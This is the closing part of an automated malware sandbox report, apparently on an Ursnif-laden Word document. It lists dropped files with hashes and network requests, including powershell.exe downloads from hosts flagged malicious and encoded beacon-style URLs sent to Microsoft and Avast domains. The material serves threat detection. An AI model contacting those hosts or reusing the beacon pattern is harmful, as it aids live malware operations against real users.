2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\hotjar-470805[1].js
text
MD5: be44940c129576813daa07deab04e438
SHA256: 5ff4565143fc4518c291f0f542591749ea27557a3df92962faec5d382fd9b9af
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\BCC58H84.txt
text
MD5: ea40d55c8b8d94ec5b5f7bfe98edab3f
SHA256: 123fb0d6dd0a6ab652dd89c82fd69528de26e3cad0a267e51726fabc53eaf84e
1924
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8D26CD23-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\WR9MHUTU.txt
text
MD5: 4321bec4eff345f2101486f75da39518
SHA256: d7551fe3ff202675801988a281dcaf2c637f60272a05fa26d56cc4db15e382a1
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\icon-social[1].png
image
MD5: e2bba2c8e64d4ae29f6ba555e8a79896
SHA256: ff652770fee72070a8a0c12f08eb3033606661806e49d47428693365e8b3ef5a
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\label-orange-l-r[1].svg
image
MD5: e646f6baca7ac4db9b5792acc7574a62
SHA256: 74ce7e6c10ffcd783f59ab673b2ffdc83879550b4a6e7e6aa5d54bdc10026838
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\avast-software-smaller-white[1].png
image
MD5: 2cf88b869e326c63b111516f37e954ca
SHA256: 38fa8e44276501f2fcc71396800a6a150500ab970479ab85cb5716ae1ad48391
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\flag-language-selector-sprite-v10[1].png
image
MD5: 13672f1180d683c7208ea726a5f4ce2e
SHA256: 6d48f7f89b511958c0841c0cf1ded82cf290b9188b1e7953918eb593e8b5043c
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\label-orange-l-l[1].svg
image
MD5: 3de2765c63008eae30ca4aa33c00cbf6
SHA256: 40dfebee8f615ebaf39928a31a44a64b05b050b26521dc9d015e5756aafbf7ae
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\63Z12HP3.txt
––
MD5:  ––
SHA256:  ––
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\HPMWUX2D.txt
text
MD5: aa5c6e286be6730faabac4e7728d5a1e
SHA256: 3de0d94a1fae149f437609c498dd0149990a1d76513d0a6e319b0b8bc7a8d18e
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\j[1].js
text
MD5: 8b98b22806ab2c7252e33c5f129c31f4
SHA256: e9c811dd778965eda613c2f1531cc3473c2c273e69205c174ec7c8c02673f2d2
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\it404[1].png
image
MD5: 8bb2209f045eb28510e559d37080823c
SHA256: 0df26efaf215eca39481fd0018ecbeb021bba0b11e83a7a4cd1fba94cb0f4644
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\avast[1].js
text
MD5: 79a290d3ac930279b3a18d3785f31894
SHA256: 9c233f48a211e7905ab7fb34761cdf23c64503d866381615c3b40449df9d3bb5
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\proximanova-light-webfont[1].eot
eot
MD5: 5edc326061e8d8ff25d497fdbb06e8e7
SHA256: 1c86f0b81517d6c849348da814d8d886f8a0d47e2d4d441c261429913ce7a10f
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\proximanova-lightit-webfont[1].eot
eot
MD5: 9d9df457126fe3199b8889099d9fcb29
SHA256: ceecb7a157e7126638cad7d2c504f4bf7aa39a668383416914fe74310ee93f5e
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\client[1].js
binary
MD5: 68b329da9893e34099c7d8ad5cb9c940
SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\proximanova-bold-webfont[1].eot
eot
MD5: 0e9a96107705c7c24793ced5eeab4b38
SHA256: ee04f31fdd834d3ae8800d38d6f37bc5d7681dc7945b06a94b183963614ca72f
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\proximanova-regular-webfont[1].eot
eot
MD5: 0e1daeaf146d0a08097513315655f19e
SHA256: 3eed3197aecf9c5bdd35eddb9431cddfd263879f01780de18de7331a3b957573
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\gtm[1].js
text
MD5: 9526a0d4763af6dcbaccff2b8b261275
SHA256: cf9b69973b0f61e684c95fcc5bef85e5be8bb777c0c80a4ba86fe704671e2427
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\jquery[1].js
text
MD5: 1eceeafc65bb7284f92c4fa606a2ce20
SHA256: 45d919ae107284dc419f9a83de4afaa7675f5ce0f1b28e2cafb7b1b81cbbabfe
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\icon-search-32[1].png
image
MD5: 2235859c6b8d2234115aa9de82e17fe0
SHA256: dbc5549cbb0cc4c3d03e99d189f2f53e75f7344a6526f0c14e7fab6ddddb2d46
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\common-web-v12[1].css
text
MD5: 7ca8f13fb0056207bf7d5d0de0af36c6
SHA256: 6b693da2d5d36ad9802021b92916580bd44160351573922324b47efbf7371154
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\local[1].css
text
MD5: f969a9af1d85cf4736b415c6d8fcbc38
SHA256: cc0aa6f69184ce75f3ab0c5049cd82da882ea261099e823d5677182cf789e88e
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\avast-software-dark[1].png
image
MD5: c786920302f3f9e0a7748d83ea08a419
SHA256: e4926bd1f8daa848f270dffd5cab67c83cc992c51f13bc5a56877b3185e6232b
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\error-page-3[1].css
text
MD5: e68e5046c5a565ffb7dada6f9ff6d8aa
SHA256: 79316061baef62f9bea60e9a9d06495d4a87d96f59609ad271ba48863d0b3c55
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\C5j[1].htm
html
MD5: cd2e0e43980a00fb6a2742d3afd803b8
SHA256: bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{5FD5F305-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2448
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF6C7B6060EFCC8FB9.TMP
––
MD5:  ––
SHA256:  ––
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
xml
MD5: af8cee8f6c59a62c88e12e8d0cc304c4
SHA256: 96bfac0566038759c2513e586e0e8a938f6ca2ce0b844d765bb453e64feb9b39
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\urlblockindex[1].bin
binary
MD5: fa518e3dfae8ca3a0e495460fd60c791
SHA256: 775853600060162c4b4e5f883f9fd5a278e61c471b3ee1826396b6d129499aa7
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\iecompatviewlist[1].xml
xml
MD5: af8cee8f6c59a62c88e12e8d0cc304c4
SHA256: 96bfac0566038759c2513e586e0e8a938f6ca2ce0b844d765bb453e64feb9b39
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{5FD5F307-A96B-11E9-9FBD-5254004AAD21}.dat
binary
MD5: 52cba305771d57ddfb41837a8f560f98
SHA256: 327ba7fd90d87900b4f019ddc9d449c6c08de3a3b6bce3ad0967ffeb937da7e0
2448
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFB3471C64BFBA7458.TMP
––
MD5:  ––
SHA256:  ––
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
2448
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico
––
MD5:  ––
SHA256:  ––
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\MWFMDL2[1].woff
woff
MD5: 5ed659cf5fc777935283bbc8ae7cc19a
SHA256: 31b8037945123706cb78d80d4d762695df8c0755e9f7412e9961953b375708ae
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\mwfmdl2-v3.07[1].woff
woff
MD5: dae68c4a8aac30a0c75731aa3c7553f3
SHA256: 7f31cbb16dd8190854789bd1b43f15ae60940fb79afbb7cfbef664e12f8a247c
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\MWFMDL2[1].ttf
ttf
MD5: 5410c5517f1bbeb51e2d0f43bc6b4309
SHA256: 2f4e38662c0ff2fab3eb09dcb457cd0778501bffee4026f6b0d9364abb05db46
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\mwf-west-european-default.min[1].css
text
MD5: 12dd1e4d0485a80184b36d158018de81
SHA256: a04b5b8b345e79987621008e6cc9bef2b684663f9a820a0c7460e727a2a4ddc3
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\mscc-0.4.1.min[1].js
text
MD5: 5e9a1f4aa31d4aa60f6f899a2e45cef8
SHA256: c87516d7dd7077edd467f5b7b085b035cd4803ecf049670ab19de004e270aba8
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\RE1Mu3b[1].png
image
MD5: 9f14c20150a003d7ce4de57c298f0fba
SHA256: 112fec798b78aa02e102a724b5cb1990c0f909bc1d8b7b1fa256eab41bbc0960
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\mscc-0.4.1.min[1].css
text
MD5: d8c2b180c40bcc7ffcbe2c68b57d8fa2
SHA256: 35211f76c4c35c17f2649b96868c0d691f1d78b107f7635d22619948d0ee6880
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\jquery-1.9.1.min[1].js
text
MD5: 397754ba49e9e0cf4e7c190da78dda05
SHA256: c12f6098e641aaca96c60215800f18f5671039aecf812217fab3c0d152f6adb4
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\51-6d3a1e[1].css
text
MD5: 6178d19989d7964964a1cc7bed82f341
SHA256: 3abc05cf7fcd206115a9f2871547be6a8649c34b2efc0d1f77441147a5a78bc8
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\override[1].css
text
MD5: a570448f8e33150f5737b9a57b6d889a
SHA256: 0bd288d5397a69ead391875b422bf2cbdcc4f795d64aa2f780aff45768d78248
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\18-d72213[1].js
text
MD5: 59ad05cbcce6803fb00314310f20fc45
SHA256: 55afd02f9ca1fe1b8d3705ef8eba7c9a8e2f0ba4b8d1ab8853a2a10fae9e4ac8
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\QDLRITMQ.txt
text
MD5: c481516cc832f5c8e9e5d5cc2a099b08
SHA256: c634e07f9902eca9d378ba35a2601fb2954cfaab340b3f07ae99e1d8eaa318bc
2080
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
binary
MD5: 2cabc4c3eb9fe9ab75f306db1561ac74
SHA256: ab992d2997fa21a8246d531c54453218ddaf4bf42e506269b8654a1e1c272089
2080
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFef2f7.TMP
binary
MD5: 2cabc4c3eb9fe9ab75f306db1561ac74
SHA256: ab992d2997fa21a8246d531c54453218ddaf4bf42e506269b8654a1e1c272089
2080
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\10TC1QCKJH45LIAHGHO0.temp
––
MD5:  ––
SHA256:  ––
2904
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
tlb
MD5: 0fbcb3b2e913918bdcefd5c412d29a7a
SHA256: 124a4380bfb50013f10c4c93c925aefddff27a537825ab3c1dfe870ea2d5d620
2904
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Ursnif_Usa.doc.LNK
lnk
MD5: 3c9d3c199e63414320fd5db165c9d570
SHA256: ef417ec3b3e0116e3ac7a0d8783f08f4e8d559d70370b8b306b74a37a6e44c61
2904
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 1e9bae7c596bc29580663e53abbd3bce
SHA256: b83bbfcd4917fff9faf299deef6d50b54fba50459489eb47ed84de6300ea29d0
2904
WINWORD.EXE
C:\Users\admin\Desktop\~$snif_Usa.doc
pgc
MD5: c458d3df6213eca154f206381a5f633c
SHA256: b7480bbfcb6f8c2936128c2d921ff1b543d4e530834c67bfba84d2fd644f28d5
2904
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRD378.tmp.cvr
––
MD5:  ––
SHA256:  ––
2940
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa2940.39322\Ursnif_Usa.doc
document
MD5: a3e1e2e62d1c512ef2a53958e11b2e48
SHA256: dc787e0dc5026fc1ce7a794c88f907f17b955d1690259df5c96ca8dd99cffa67
1924
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFA0B56ADC5BFD5DE8.TMP
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
69
TCP/UDP connections
67
DNS requests
38
Threats
12

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2080 powershell.exe GET 404 147.78.66.46:80 http://dx019xsl1pace.xyz/sywo/fgoow.php?l=styer1.gxl unknown
––
––
malicious
2080 powershell.exe GET –– 109.196.164.79:80 http://109.196.164.79/3.php unknown
––
––
suspicious
2080 powershell.exe GET –– 109.196.164.79:80 http://109.196.164.79/3.php unknown
––
––
suspicious
2476 IEXPLORE.EXE GET 404 2.21.41.70:443 https://www.microsoft.com/images/4v9PDHxp2bGz/CqZm5Cue9gp/prpBCTxEZbkMgo/F_2BIso8VGkD2KVHUrcb7/VTrLrlcnZie9ZiMe/xNrRHp2GqLcgDbh/xZHT_2BvvGHPqxppPt/4YJWqiRhJ/Kv7izJ5_2BAPjJ8XYLSt/cq0xfLvwXByzeXQ4JcP/I.avi FR
html
whitelisted
2476 IEXPLORE.EXE GET 301 40.113.200.201:80 http://microsoft.com/images/4v9PDHxp2bGz/CqZm5Cue9gp/prpBCTxEZbkMgo/F_2BIso8VGkD2KVHUrcb7/VTrLrlcnZie9ZiMe/xNrRHp2GqLcgDbh/xZHT_2BvvGHPqxppPt/4YJWqiRhJ/Kv7izJ5_2BAPjJ8XYLSt/cq0xfLvwXByzeXQ4JcP/I.avi US
––
––
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.32:443 https://statics-uhf-wus.akamaized.net/statics/override.css?c=7 unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.32:443 https://statics-uhf-wus.akamaized.net/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/7f-652c90/63-077520/a4-34de62/75-71ddfc/db-bc0148/dc-7e9864/78-4c7d22/9f-d154ca/e4-8302f6/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/32-6dafa3/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/18-d72213?ver=2.0&iife=1 unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.27:443 https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31 unknown
image
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.32:443 https://statics-uhf-wus.akamaized.net/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/e9-4413b1/4e-bb306d/a9-963a11/10-aee09b/51-465167/1d-9730ee/34-521645/51-6d3a1e?ver=2.0 unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.18.233.62:443 https://c.s-microsoft.com/mscc/statics/mscc-0.4.1.min.css unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 152.199.19.160:443 https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js US
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.18.233.62:443 https://c.s-microsoft.com/mscc/statics/mscc-0.4.1.min.js unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.19.39.63:443 https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.19.39.63:443 https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/fonts/MWFMDL2.ttf unknown
ttf
whitelisted
2476 IEXPLORE.EXE GET 200 2.21.41.70:443 https://www.microsoft.com/mwf/_h/v3.07/mwf.app/fonts/mwfmdl2-v3.07.woff FR
woff
whitelisted
2476 IEXPLORE.EXE GET 200 2.19.39.63:443 https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/fonts/MWFMDL2.woff unknown
woff
whitelisted
2476 IEXPLORE.EXE GET 204 2.18.232.244:443 https://uhf.microsoft.com/_log?o=mscc&s=Microsoft.OneRenderFramework.Core&m=show&nv=aspnet-3.1.3&sv=0.1.2 unknown
––
––
whitelisted
2448 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
2448 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
2448 iexplore.exe GET 200 152.199.19.161:443 https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml US
xml
whitelisted
2448 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin US
binary
whitelisted
2448 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin US
––
––
whitelisted
2448 iexplore.exe GET 304 152.199.19.161:443 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml US
––
––
whitelisted
2828 IEXPLORE.EXE GET 301 5.62.40.96:80 http://avast.com/images/XwESZsNY4Gk6WaVeonp/FaEKtuDMEUOAVncZoElyUg/mU5vD4UBW5RIM/M6hwqzoj/JOtpRom3aWw1vBxNmbCY82J/j8acWNZCGz/wMzfuFVWEVFo_2BkH/_2B71pxiWPEP/fZi63JkNCXx/PK1wJFwssWujstzW/C5j.avi DE
html
whitelisted
2828 IEXPLORE.EXE GET 404 104.108.46.190:443 https://www.avast.com/images/XwESZsNY4Gk6WaVeonp/FaEKtuDMEUOAVncZoElyUg/mU5vD4UBW5RIM/M6hwqzoj/JOtpRom3aWw1vBxNmbCY82J/j8acWNZCGz/wMzfuFVWEVFo_2BkH/_2B71pxiWPEP/fZi63JkNCXx/PK1wJFwssWujstzW/C5j.avi NL
html
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/c/mkt/error-page-3.css unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/c/local/en-ww/local.css unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/c/common-web-v12.css unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/avast-software-dark.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/ico/icon-search-32.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/j/jquery.js unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 216.58.210.8:443 https://www.googletagmanager.com/gtm.js?id=GTM-PZ48F8 US
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static.avast.com/client.js unknown
binary
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/700/proximanova-bold-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/300/proximanova-light-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/400/proximanova-regular-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/300/proximanova-lightit-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/j/avast.js unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/error/it404.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 159.122.87.148:443 https://dev.visualwebsiteoptimizer.com/j.php?a=101094&u=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&r=0.7774996979181491 DE
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/avast-software-smaller-white.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/flags/flag-language-selector-sprite-v10.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/i-v12/icon-social.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/label/label-orange-l-l.svg unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/label/label-orange-l-r.svg unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 159.122.87.148:443 https://dev.visualwebsiteoptimizer.com/v.gif?a=101094&d=avast.com&u=DA75B93168C049E948157AA2E41341BC6&h=6f3afb4fd0e0ff017aeb9cf8c0fa8a46&t=false&r=0.685666491908622 DE
image
whitelisted
2828 IEXPLORE.EXE GET 200 147.75.83.123:443 https://static.hotjar.com/c/hotjar-470805.js?sv=5 US
text
whitelisted
2828 IEXPLORE.EXE GET 200 216.58.208.46:443 https://www.google-analytics.com/analytics.js US
text
whitelisted
2828 IEXPLORE.EXE GET 200 77.88.21.119:443 https://mc.yandex.ru/metrika/watch.js RU
text
whitelisted
2828 IEXPLORE.EXE GET 200 104.108.46.190:443 https://www.avast.com/api/v1/tooltip?locale=en-ww NL
xml
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/arrows/slide-top.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 147.75.32.75:443 https://script.hotjar.com/modules.cf35bc326ce7f74ad61b.js US
text
whitelisted
2828 IEXPLORE.EXE POST 200 172.217.16.142:443 https://ampcid.google.com/v1/publisher:getClientId?key=AIzaSyA65lEHUEizIsNtlbNo-l2K18dT680nsaM US
text
text
whitelisted
1440 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
1440 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
2828 IEXPLORE.EXE POST 302 77.88.21.119:443 https://mc.yandex.ru/watch/34150835?wmode=7&page-url=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&charset=utf-8&browser-info=ti%3A10%3Aj%3A1%3Ans%3A1563461475627%3As%3A1280x720x24%3Ask%3A1%3Af%3A27.0.0.187%3Afpr%3A411595655001%3Acn%3A1%3Aw%3A776x521%3Ai%3A20190718145119%3Aet%3A1563461480%3Aen%3Autf-8%3Ac%3A1%3Ala%3Aen-us%3Awh%3A1%3Apv%3A1%3Als%3A931635438724%3Arqn%3A1%3Arn%3A24857546%3Ahid%3A711976697%3Ads%3A0%2C0%2C0%2C111%2C1%2C0%2C0%2C2631%2C0%2C%2C%2C%2C2632%3Agdpr%3A14%3Av%3A1609%3Arqnl%3A1%3Ast%3A1563461480%3Au%3A1563461480675499970%3At%3APage%20not%20found RU
––
––
whitelisted
2828 IEXPLORE.EXE GET 200 77.88.21.119:443 https://mc.yandex.ru/metrika/advert.gif RU
image
whitelisted
